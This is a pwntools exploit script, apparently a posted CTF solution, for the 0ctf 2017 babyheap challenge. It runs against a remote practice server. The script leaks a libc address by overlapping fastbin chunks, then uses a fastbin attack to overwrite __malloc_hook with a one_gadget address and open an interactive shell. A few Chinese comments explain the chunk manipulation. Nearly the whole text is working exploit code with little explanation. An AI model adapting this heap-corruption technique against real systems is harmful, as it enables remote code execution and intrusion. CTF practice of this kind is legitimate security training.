from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./0ctf_2017_babyheap"
io = remote("node4.buuoj.cn",28243)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
def add(size):
io.recvuntil(b"Command: ")
io.sendline(b"1")
io.recvuntil(b"Size: ")
io.sendline(str(size))
def edit(idx,size,data):
io.recvuntil(b"Command: ")
io.sendline(b"2")
io.recvuntil(b"Index: ")
io.sendline(str(idx))
io.recvuntil(b"Size: ")
io.sendline(str(size))
io.recvuntil(b"Content: ")
io.send(data)
def free(idx):
io.recvuntil(b"Command: ")
io.sendline(b"3")
io.recvuntil(b"Index: ")
io.sendline(str(idx))
def show(idx):
io.recvuntil(b"Command: ")
io.sendline(b"4")
io.recvuntil(b"Index: ")
io.sendline(str(idx))
add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4
free(1)
free(2)
payload = p64(0)*3 + p64(0x21) + p64(0)*3 + p64(0x21)+p8(0x80)
edit(0,len(payload),payload)
payload = p64(0)*3 + p64(0x21)
edit(3,len(payload),payload)
add(0x10) #1
add(0x10) #2
payload = p64(0)*3 + p64(0x91)
edit(3,len(payload),payload)
add(0x80) #5 申请一块大空间,避免4号块和top chunk合并
free(4)
show(2)
__malloc_hook = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\0')) - 88 - 0x10
libc_base = __malloc_hook - libc.symbols["__malloc_hook"]
log.info("__malloc_hook: "+ hex(__malloc_hook))
log.info("libc_base: "+ hex(libc_base))
add(0x60)
free(4) # 相当于做一个切割,将0x80的块分成0x60在fastbin中,0x20在unsortedbin中
payload = p64(__malloc_hook - 35)
edit(2,len(payload),payload)
add(0x60)
add(0x60) # 这个就会申请到假chunk
payload = b'a'*(0x8+0x2+0x8+1)
payload += p64(libc_base+0x4526a)
edit(6,len(payload),payload)
add(79)
io.interactive()
0ctf_2017_babyheap
最新推荐文章于 2024-07-22 22:58:19 发布